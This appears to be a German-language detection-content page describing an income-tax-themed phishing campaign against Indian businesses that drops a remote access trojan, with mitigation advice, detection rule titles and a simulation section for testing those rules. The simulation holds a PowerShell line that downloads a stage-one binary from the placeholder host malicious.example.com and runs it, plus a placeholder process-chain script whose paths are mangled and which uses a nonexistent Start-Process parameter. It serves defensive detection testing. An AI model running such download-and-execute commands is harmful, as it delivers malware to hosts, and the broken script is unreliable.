Phishing-Kampagne fälscht indische Einkommensteuer zur Zielausrichtung auf Unternehmen
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Eine Phishing-Operation, die das indische Finanzamt imitiert, liefert ein präpariertes PDF, das Empfänger zu einem gefälschten Compliance-Portal führt. Die Seite fordert die Opfer auf, ein ZIP-Paket herunterzuladen, das einen signierten NSIS-Installer enthält, welcher dann eine mehrstufige Remote Access Trojan (RAT) ausführt. Der RAT bleibt bestehen, indem er einen Windows-Dienst erstellt und mit mehreren C2-Servern über nicht-standardisierte Ports kommuniziert.
Untersuchung
Forscher analysierten den PDF-Köder, die eingebettete URL und den verketteten NSIS-Installer-Workflow. Sie dokumentierten die auf die Festplatte übertragenen Binärdateien, die Erstellung eines versteckten Installationsordners und die Registrierung von NSecRTS.exe als Windows-Dienst. Der Bericht erfasste auch ausgehende Kommunikation zu drei IP-Adressen und hob die Verwendung signierter Payloads während der gesamten Lieferkette hervor.
Abhilfe
Blockieren Sie die bösartige Domain und die zugehörigen IP-Adressen am Perimeter und durch Proxy-Kontrollen. Stärken Sie den E-Mail-Schutz, um steuerbezogene Anhänge und Links zu Compliance-Portalen im Lookalike-Design zu kennzeichnen. Verhindern Sie die automatische Ausführung nicht vertrauenswürdiger Installer, wo möglich, und überwachen Sie die Erstellung verdächtiger Dienste – insbesondere alles, das den Namen „Windows Real-time Protection Service“
trägt.
Alarmieren Sie bei den aufgeführten Dateinamen, Hashes und Aktivitäten zur Windows-Dienstregistrierung, die mit der Infektionskette verbunden sind. Isolieren Sie betroffene Endpunkte, erfassen Sie Arbeitsspeicher- und Festplattenabbilder und führen Sie eine vollständige forensische Untersuchung durch, um weitere RAT-Stufen oder Tools zu identifizieren. Entfernen Sie Persistenzartefakte und setzen Sie potenziell exponierte Anmeldeinformationen zurück, um erneuten Zugriff zu verhindern.
Angriffsfluss
Erkennungen
Verdächtige Command and Control durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfrage (via DNS)
Ansehen
IOCs (DestinationIP) zum Erkennen: Indian Income Tax-Themed Phishing Campaign Targets Local Businesses
Ansehen
IOCs (SourceIP) zum Erkennen: Indian Income Tax-Themed Phishing Campaign Targets Local Businesses
Ansehen
IOCs (HashMd5) zum Erkennen: Indian Income Tax-Themed Phishing Campaign Targets Local Businesses
Ansehen
Erkennung der Malware-Ausführung in Indian Income Tax-Themed Phishing Campaign [Windows-Prozesserstellung]
Ansehen
Erkennung der NSecRTS.exe C2 Kommunikation [Windows-Netzwerkverbindung]
Ansehen
Simulation der Ausführung
Voraussetzung: Der Telemetrie- und Basislinien-Vorflug-Check muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die die Erkennungsregel auslösen soll. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.
-
Angriffserzählung & Befehle:
Ein Angreifer liefert eine Phishing-E-Mail mit dem Titel „Einkommenssteuerbescheid“. Der Anhang ist ein bösartiges Word-Dokument, das ablegtsetup_Ir5swQ3EpeuBpePEpew=.exeto%TEMP%. Das Opfer führt die Datei aus, die wiederumSibuia.exe(die tatsächliche Nutzlast) als Kindprozess erzeugt. Diese Eltern-Kind-Kette soll generische Prozess-Erstellungswarnungen umgehen, wird aber von der Sigma-Regel erfasst.Schritte, die auf dem kompromittierten Host durchgeführt wurden:
- Das erste Stufenbinärformat ablegen:
$stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" Invoke-WebRequest -Uri "http://malicious.example.com/stage1" -OutFile $stage1 - Das erste Stufenbinärformat ausführen:
Start-Process -FilePath $stage1 -NoNewWindow - Das erste Stufenbinärformat erstellt intern das zweite Stufenbinärformat
Sibuia.exeim selben Verzeichnis und startet es: (Simuliert durch das unten stehende Testskript.)
- Das erste Stufenbinärformat ablegen:
-
Regressionstest-Skript:
Das Skript unten reproduziert die exakte Eltern-Kind-Beziehung, die zur Auslösung der Regel erforderlich ist.# ------------------------------------------------- # Simulation der indischen Einkommenssteuer-Phishing-Kette # ------------------------------------------------- # Pfade definieren $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" $stage2 = "$env:TEMPSibuia.exe" # Dummy-Binärdateien erstellen (Null-Byte - ausreichend für Sysmon-Protokollierung) Set-Content -Path $stage1 -Value 'REM stage1 placeholder' -Encoding ASCII Set-Content -Path $stage2 -Value 'REM stage2 placeholder' -Encoding ASCII # Sicherstellen, dass Dateien ausführbar sind (Windows benötigt kein chmod) Write-Host "[*] Stufe1 wird gestartet..." $proc1 = Start-Process -FilePath $stage1 -PassThru # Stufe1 einen Moment zum „Erzeugen“ von Stufe2 (simuliert durch direkten Start) geben Start-Sleep -Milliseconds 500 Write-Host "[*] Stufe1 erzeugt Stufe2 (Sibuia.exe)..." $proc2 = Start-Process -FilePath $stage2 -PassThru -Parent $proc1.Id Write-Host "[+] Simulation abgeschlossen. Überprüfen Sie die Erkennung im SIEM." # ------------------------------------------------- -
Bereinigungsbefehle:
Entfernen Sie die Artefakte und beenden Sie alle verbleibenden Prozesse.# Alle verbleibenden Prozesse stoppen Get-Process -Name "setup_Ir5swQ3EpeuBpePEpew=" -ErrorAction SilentlyContinue | Stop-Process -Force Get-Process -Name "Sibuia" -ErrorAction SilentlyContinue | Stop-Process -Force # Dateien löschen Remove-Item -Path "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPSibuia.exe" -Force -ErrorAction SilentlyContinue Write-Host "[*] Bereinigung abgeschlossen."